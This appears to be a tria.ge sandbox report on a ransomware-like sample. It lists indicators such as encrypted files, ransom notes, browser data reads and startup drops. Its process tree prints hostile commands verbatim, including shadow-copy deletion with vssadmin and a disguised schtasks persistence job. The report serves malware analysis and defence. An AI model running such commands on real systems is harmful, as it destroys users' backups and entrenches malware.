Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
max time kernel: 131s
max time network: 48s
platform: windows7_x64
resource: win7-20220414-en
submitted: 04/05/2022, 19:29
Static task: static1
Behavioral task: behavioral1 (Sample: sample.exe, Resource: win7-20220414-en)
Behavioral task: behavioral2 (Sample: sample.exe, Resource: win10v2004-20220414-en)
General
Target: sample.exe
Size: 1.1MB
MD5: a56644a519d6fce5f20a744ae3820af2
SHA1: 93acd978da4a602c9ea1a23b6a97d74ced436e56
SHA256: 563daaab9f9d7be02f037c540d561c424aa3e5efc6a9a5c8d58858d98e2aae3c
SHA512: 5ee5ae6d10bb4c3290664454666bd5f82d694bb772d9d5e6dc9e29cb7129cf696ac5b694676eb78074e4196a459e66f6b34b920017af1cd2addb35a1e1b85416
Malware Config
Extracted: C:\Read_Me!_.txt
Signatures

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Executes dropped EXE (2 IoCs)
  pid | Process
  384 | Process not Found
  844 | Desktopini.exe

Modifies Windows Firewall (1 TTPs)

Modifies extensions of user files (1 IoCs)
Ransomware generally changes the extension on encrypted files.
  description | ioc | Process
  File opened for modification | C:\Users\Admin\Pictures\RenameRestart.tiff | sample.exe

Deletes itself (1 IoCs)
  pid | Process
  844 | Desktopini.exe

Drops startup file (6 IoCs)
  description | ioc | Process
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Read_Me!_.txt | sample.exe
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe | Desktopini.exe
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe | sample.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe | sample.exe
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Read_Me!_.txt | sample.exe

Loads dropped DLL (11 IoCs)
  pid | Process
  1400 | Process not Found
  1400 | Process not Found
  384 | Process not Found
  1400 | Process not Found
  1400 | Process not Found
  1400 | Process not Found
  1400 | Process not Found
  1400 | Process not Found
  1400 | Process not Found
  1400 | Process not Found
  1400 | Process not Found
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Unexpected DNS network traffic destination (3 IoCs)
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
  description | ioc
  Destination IP | 208.67.222.222
  Destination IP | 208.67.222.222
  Destination IP | 208.67.222.222
Drops desktop.ini file(s) (64 IoCs)
  description | ioc | Process
  File opened for modification | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\desktop.ini | sample.exe
  File opened for modification | C:\Program Files\Microsoft Games\Mahjong\desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\Music\desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\Saved Games\desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\Favorites\Links for United States\desktop.ini | sample.exe
  File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini | sample.exe
  File opened for modification | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Games\Desktop.ini | sample.exe
  File opened for modification | C:\$Recycle.Bin\S-1-5-21-1819626980-2277161760-1023733287-1000\desktop.ini | Desktopini.exe
  File opened for modification | C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\PWZ8QZ9F\desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D396AG1W\desktop.ini | sample.exe
  File opened for modification | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | sample.exe
  File opened for modification | C:\Users\Public\Desktop\desktop.ini | sample.exe
  File opened for modification | C:\Users\Public\Music\desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | sample.exe
  File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini | sample.exe
  File opened for modification | C:\Users\Public\desktop.ini | sample.exe
  File opened for modification | C:\Users\Public\Videos\Sample Videos\desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini | sample.exe
  File opened for modification | C:\Users\All Users\Microsoft\Windows\Ringtones\desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\Pictures\desktop.ini | sample.exe
  File opened for modification | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | sample.exe
  File opened for modification | C:\Users\Public\Videos\desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\N4DR1BTE\desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | sample.exe
  File opened for modification | C:\Users\All Users\Microsoft\Windows\Start Menu\desktop.ini | sample.exe
  File opened for modification | C:\Program Files\Microsoft Games\Chess\desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\VRG14UW3\desktop.ini | sample.exe
  File opened for modification | C:\Users\Public\Documents\desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\Downloads\desktop.ini | sample.exe
  File opened for modification | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini | sample.exe
  File opened for modification | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini | sample.exe
  File opened for modification | C:\Users\Public\Recorded TV\desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\Videos\desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I7JGZPUA\desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\Contacts\desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\Documents\desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\Links\desktop.ini | sample.exe
  File opened for modification | C:\Program Files\Microsoft Games\Solitaire\desktop.ini | sample.exe
  File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\Searches\desktop.ini | sample.exe
  File opened for modification | C:\Users\Public\Recorded TV\Sample Media\desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\P4R98AUH\desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\Desktop\desktop.ini | sample.exe
  File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | sample.exe
  File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini | sample.exe
  File opened for modification | C:\Program Files\Microsoft Games\FreeCell\desktop.ini | sample.exe
  File opened for modification | C:\Program Files (x86)\desktop.ini | sample.exe
  File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\8WU7A3BP\desktop.ini | sample.exe
Enumerates connected drives (3 TTPs, 24 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
  description | ioc | Process
  File opened (read-only) | \??\Z: | sample.exe
  File opened (read-only) | \??\G: | sample.exe
  File opened (read-only) | \??\J: | sample.exe
  File opened (read-only) | \??\M: | sample.exe
  File opened (read-only) | \??\P: | sample.exe
  File opened (read-only) | \??\Q: | sample.exe
  File opened (read-only) | \??\U: | sample.exe
  File opened (read-only) | \??\X: | sample.exe
  File opened (read-only) | \??\E: | sample.exe
  File opened (read-only) | \??\F: | sample.exe
  File opened (read-only) | \??\K: | sample.exe
  File opened (read-only) | \??\R: | sample.exe
  File opened (read-only) | \??\S: | sample.exe
  File opened (read-only) | \??\T: | sample.exe
  File opened (read-only) | \??\A: | sample.exe
  File opened (read-only) | \??\N: | sample.exe
  File opened (read-only) | \??\V: | sample.exe
  File opened (read-only) | \??\W: | sample.exe
  File opened (read-only) | \??\B: | sample.exe
  File opened (read-only) | \??\H: | sample.exe
  File opened (read-only) | \??\I: | sample.exe
  File opened (read-only) | \??\L: | sample.exe
  File opened (read-only) | \??\O: | sample.exe
  File opened (read-only) | \??\Y: | sample.exe
Drops file in Program Files directory (64 IoCs)
  description | ioc | Process
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TN00095_.WMF[[email protected]].CCBG | sample.exe
  File opened for modification | C:\Program Files\Common Files\System\msadc\msaddsr.dll | sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105710.WMF | sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfoInternal.zip | sample.exe
  File opened for modification | C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\vlc.mo[[email protected]].CCBG | sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00612_.WMF | sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\EXCEL.DEV_K_COL.HXK | sample.exe
  File opened for modification | \??\c:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\es-ES\js\settings.js | sample.exe
  File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\es-ES\js\service.js | sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\HEADER.GIF[[email protected]].CCBG | sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01126_.WMF | sample.exe
  File opened for modification | C:\Program Files (x86)\Common Files\SpeechEngines\Microsoft\TTS20\en-US\enu-dsk\M1033DSK.CRT | sample.exe
  File opened for modification | \??\c:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationRight_ButtonGraphic.png | sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\CASHREG.WAV | sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0144773.JPG[[email protected]].CCBG | sample.exe
  File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\it-IT\css\settings.css | sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Auto.jpg | sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\FAX\MedianFax.Dotx | sample.exe
  File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationUp_ButtonGraphic.png | sample.exe
  File created | C:\Program Files\Microsoft Games\Chess\it-IT\Read_Me!_.txt | sample.exe
  File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\FPERSON.DLL | sample.exe
  File opened for modification | C:\Program Files\Java\jre7\lib\fonts\LucidaSansRegular.ttf[[email protected]].CCBG | sample.exe
  File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\Read_Me!_.txt | sample.exe
  File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\timer_down.png | sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTFORM.DAT[[email protected]].CCBG | sample.exe
  File opened for modification | \??\c:\Program Files\Common Files\System\msadc\es-ES\msaddsr.dll.mui | sample.exe
  File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\bin\plugin2\msvcr100.dll | sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02794_.WMF | sample.exe
  File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\css\Read_Me!_.txt | sample.exe
  File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\blackbars60.png | sample.exe
  File opened for modification | C:\Program Files\Microsoft Games\FreeCell\FreeCell.exe | sample.exe
  File opened for modification | \??\c:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\js\clock.js | sample.exe
  File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-new_partly-cloudy.png | sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Contacts.accdt[[email protected]].CCBG | sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsPrintTemplate.html[[email protected]].CCBG | sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue.css | sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14996_.GIF[[email protected]].CCBG | sample.exe
  File opened for modification | \??\c:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\css\weather.css | sample.exe
  File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\ja-JP\js\localizedStrings.js | sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_SlateBlue.gif[[email protected]].CCBG | sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\MSYUBIN7.DLL | sample.exe
  File opened for modification | \??\c:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-first-quarter_partly-cloudy.png | sample.exe
  File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.ibm.icu_52.1.0.v201404241930.jar[[email protected]].CCBG | sample.exe
  File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\it-IT\css\Read_Me!_.txt | sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\bg_LightSpirit.gif[[email protected]].CCBG | sample.exe
  File created | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\JOURNAL\Read_Me!_.txt | sample.exe
  File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\VSTO\vstoee90.tlb | sample.exe
  File opened for modification | C:\Program Files (x86)\Common Files\System\Ole DB\msdasc.dll | sample.exe
  File created | C:\Program Files (x86)\Google\Update\Install\Read_Me!_.txt | sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00234_.WMF | sample.exe
  File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\settings.html | sample.exe
  File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\ink\es-ES\mshwLatin.dll.mui | sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL097.XML[[email protected]].CCBG | sample.exe
  File opened for modification | \??\c:\Program Files\Windows Journal\MSPVWCTL.DLL | sample.exe
  File opened for modification | \??\c:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_rainy.png | sample.exe
  File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\es-ES\js\calendar.js | sample.exe
  File created | C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Excel.en-us\Read_Me!_.txt | sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\WINWORD_F_COL.HXK[[email protected]].CCBG | sample.exe
  File opened for modification | \??\c:\Program Files\Common Files\Microsoft Shared\ink\es-ES\InkObj.dll.mui | sample.exe
  File opened for modification | C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\Read_Me!_.txt | sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Equity.xml | sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21312_.GIF[[email protected]].CCBG | sample.exe
  File opened for modification | C:\Program Files\Java\jre7\lib\zi\Asia\Singapore | sample.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE03331_.WMF | sample.exe
Drops file in Windows directory (2 IoCs)
  description | ioc | Process
  File created | C:\Windows\Pagesfilo.sys | sample.exe
  File opened for modification | C:\Windows\Pagesfilo.sys | sample.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Creates scheduled task(s) (1 TTPs, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid | Process
  1968 | schtasks.exe
  1756 | schtasks.exe

Delays execution with timeout.exe (7 IoCs)
  Process: timeout.exe
  pids: 1128, 1660, 608, 1044, 1068, 472, 388

Enumerates processes with tasklist (1 TTPs, 9 IoCs)
  Process: tasklist.exe
  pids: 1144, 536, 1200, 1964, 2044, 828, 1332, 1740, 1044

Gathers system information (1 TTPs, 2 IoCs)
Runs systeminfo.exe.
  Process: systeminfo.exe
  pids: 1872, 1744

Interacts with shadow copies (2 TTPs, 3 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
  Process: vssadmin.exe
  pids: 1636, 1432, 1964

Kills process with taskkill (64 IoCs)
  Process: taskkill.exe
  pids: 396, 752, 544, 856, 1980, 1636, 884, 856, 1980, 432, 1944, 1052, 320, 1388, 1268, 1972, 1388, 608, 1064, 608, 1636, 820, 1276, 1740, 856, 1956, 1792, 2004, 884, 1352, 524, 2004, 960, 1776, 1124, 884, 2008, 1176, 1180, 1792, 1364, 960, 2044, 1196, 1900, 1792, 1196, 1972, 1636, 960, 1956, 1268, 844, 980, 1364, 1956, 1948, 2044, 1388, 652, 608, 1052, 1980, 1488

Modifies registry key (1 TTPs, 2 IoCs)
  Process: reg.exe
  pids: 1992, 764

Suspicious behavior: EnumeratesProcesses (8 IoCs)
  Process: tasklist.exe
  pids: 2044, 2044, 1144, 1144, 1740, 1740, 1044, 1044
Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Token | pid | Process
  SeDebugPrivilege | 2044 | tasklist.exe
  SeDebugPrivilege | 1144 | tasklist.exe
  SeBackupPrivilege | 1096 | vssvc.exe
  SeRestorePrivilege | 1096 | vssvc.exe
  SeAuditPrivilege | 1096 | vssvc.exe
  SeIncreaseQuotaPrivilege | 1128 | WMIC.exe
  SeSecurityPrivilege | 1128 | WMIC.exe
  SeTakeOwnershipPrivilege | 1128 | WMIC.exe
  SeLoadDriverPrivilege | 1128 | WMIC.exe
  SeSystemProfilePrivilege | 1128 | WMIC.exe
  SeSystemtimePrivilege | 1128 | WMIC.exe
  SeProfSingleProcessPrivilege | 1128 | WMIC.exe
  SeIncBasePriorityPrivilege | 1128 | WMIC.exe
  SeCreatePagefilePrivilege | 1128 | WMIC.exe
  SeBackupPrivilege | 1128 | WMIC.exe
  SeRestorePrivilege | 1128 | WMIC.exe
  SeShutdownPrivilege | 1128 | WMIC.exe
  SeDebugPrivilege | 1128 | WMIC.exe
  SeSystemEnvironmentPrivilege | 1128 | WMIC.exe
  SeRemoteShutdownPrivilege | 1128 | WMIC.exe
  SeUndockPrivilege | 1128 | WMIC.exe
  SeManageVolumePrivilege | 1128 | WMIC.exe
  33 | 1128 | WMIC.exe
  34 | 1128 | WMIC.exe
  35 | 1128 | WMIC.exe
  SeIncreaseQuotaPrivilege | 1128 | WMIC.exe
  SeSecurityPrivilege | 1128 | WMIC.exe
  SeTakeOwnershipPrivilege | 1128 | WMIC.exe
  SeLoadDriverPrivilege | 1128 | WMIC.exe
  SeSystemProfilePrivilege | 1128 | WMIC.exe
  SeSystemtimePrivilege | 1128 | WMIC.exe
  SeProfSingleProcessPrivilege | 1128 | WMIC.exe
  SeIncBasePriorityPrivilege | 1128 | WMIC.exe
  SeCreatePagefilePrivilege | 1128 | WMIC.exe
  SeBackupPrivilege | 1128 | WMIC.exe
  SeRestorePrivilege | 1128 | WMIC.exe
  SeShutdownPrivilege | 1128 | WMIC.exe
  SeDebugPrivilege | 1128 | WMIC.exe
  SeSystemEnvironmentPrivilege | 1128 | WMIC.exe
  SeRemoteShutdownPrivilege | 1128 | WMIC.exe
  SeUndockPrivilege | 1128 | WMIC.exe
  SeManageVolumePrivilege | 1128 | WMIC.exe
  33 | 1128 | WMIC.exe
  34 | 1128 | WMIC.exe
  35 | 1128 | WMIC.exe
  SeDebugPrivilege | 1636 | taskkill.exe
  SeDebugPrivilege | 432 | taskkill.exe
  SeDebugPrivilege | 2044 | taskkill.exe
  SeDebugPrivilege | 884 | taskkill.exe
  SeDebugPrivilege | 1196 | taskkill.exe
  SeDebugPrivilege | 1352 | taskkill.exe
  SeDebugPrivilege | 2012 | taskkill.exe
  SeDebugPrivilege | 1972 | taskkill.exe
  SeDebugPrivilege | 1696 | taskkill.exe
  SeDebugPrivilege | 1948 | taskkill.exe
  SeDebugPrivilege | 396 | taskkill.exe
  SeDebugPrivilege | 652 | taskkill.exe
  SeDebugPrivilege | 820 | taskkill.exe
  SeDebugPrivilege | 1268 | taskkill.exe
  SeDebugPrivilege | 1900 | taskkill.exe
  SeDebugPrivilege | 1052 | taskkill.exe
  SeDebugPrivilege | 388 | taskkill.exe
  SeDebugPrivilege | 844 | taskkill.exe
  SeDebugPrivilege | 1124 | taskkill.exe
Suspicious use of WriteProcessMemory (64 IoCs)
  description | pid | Process | procid_target   (each row below is recorded 4 times in the report)
  PID 1336 wrote to memory of 884 | 1336 | sample.exe | 28
  PID 884 wrote to memory of 2044 | 884 | cmd.exe | 29
  PID 884 wrote to memory of 1912 | 884 | cmd.exe | 30
  PID 1336 wrote to memory of 1812 | 1336 | sample.exe | 32
  PID 1336 wrote to memory of 388 | 1336 | sample.exe | 33
  PID 388 wrote to memory of 1356 | 388 | cmd.exe | 34
  PID 1336 wrote to memory of 1700 | 1336 | sample.exe | 35
  PID 1700 wrote to memory of 1756 | 1700 | cmd.exe | 36
  PID 1356 wrote to memory of 616 | 1356 | WScript.exe | 37
  PID 1356 wrote to memory of 112 | 1356 | WScript.exe | 39
  PID 112 wrote to memory of 1144 | 112 | cmd.exe | 41
  PID 112 wrote to memory of 1948 | 112 | cmd.exe | 42
  PID 1336 wrote to memory of 1712 | 1336 | sample.exe | 43
  PID 112 wrote to memory of 1636 | 112 | cmd.exe | 44
  PID 1336 wrote to memory of 1332 | 1336 | sample.exe | 45
  PID 1332 wrote to memory of 1872 | 1332 | cmd.exe | 47
Processes
-
C:\Users\Admin\AppData\Local\Temp\sample.exe"C:\Users\Admin\AppData\Local\Temp\sample.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1336 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"2⤵
- Suspicious use of WriteProcessMemory
PID:884 -
C:\Windows\SysWOW64\tasklist.exetasklist /v /fo csv3⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2044
-
-
C:\Windows\SysWOW64\findstr.exefindstr /i "dcdcf"3⤵PID:1912
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ver2⤵PID:1812
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&t2_svc.bat2⤵
- Suspicious use of WriteProcessMemory
PID:388 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\v9_svc.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C echo C:\Users\Admin\AppData\h4_svc.bat4⤵PID:616
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\h4_svc.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:112 -
C:\Windows\SysWOW64\tasklist.exetasklist /v5⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1144
-
-
C:\Windows\SysWOW64\find.exefind /I /c "dcdcf"5⤵PID:1948
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet5⤵
- Interacts with shadow copies
PID:1636
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:472
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq sample.exe" /fo csv5⤵
- Enumerates processes with tasklist
PID:536
-
-
C:\Windows\SysWOW64\find.exefind /I "sample.exe"5⤵PID:1556
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:388
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq sample.exe" /fo csv5⤵
- Enumerates processes with tasklist
PID:1200
-
-
C:\Windows\SysWOW64\find.exefind /I "sample.exe"5⤵PID:1204
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:1128
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq sample.exe" /fo csv5⤵
- Enumerates processes with tasklist
PID:828
-
-
C:\Windows\SysWOW64\find.exefind /I "sample.exe"5⤵PID:1936
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:1660
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq sample.exe" /fo csv5⤵
- Enumerates processes with tasklist
PID:1332
-
-
C:\Windows\SysWOW64\find.exefind /I "sample.exe"5⤵PID:1484
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:608
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq sample.exe" /fo csv5⤵
- Enumerates processes with tasklist
PID:1964
-
-
C:\Windows\SysWOW64\find.exefind /I "sample.exe"5⤵PID:432
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:1044
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 90 /nobreak5⤵
- Delays execution with timeout.exe
PID:1068
-
-
-
-
-
  * C:\Windows\SysWOW64\cmd.exe (PID 1700)
    C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\t2_svc.bat'" /f
    - Suspicious use of WriteProcessMemory
    * C:\Windows\SysWOW64\schtasks.exe (PID 1756)
      schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\Admin\AppData\t2_svc.bat'" /f
      - Creates scheduled task(s)
  * C:\Windows\SysWOW64\cmd.exe (PID 1712)
    C:\Windows\system32\cmd.exe /c echo %date%-%time%
  * C:\Windows\SysWOW64\cmd.exe (PID 1332)
    C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
    - Suspicious use of WriteProcessMemory
    * C:\Windows\SysWOW64\systeminfo.exe (PID 1872)
      systeminfo
      - Gathers system information
    * C:\Windows\SysWOW64\find.exe (PID 1268)
      find /i "os name"
  * C:\Windows\SysWOW64\cmd.exe (PID 1084)
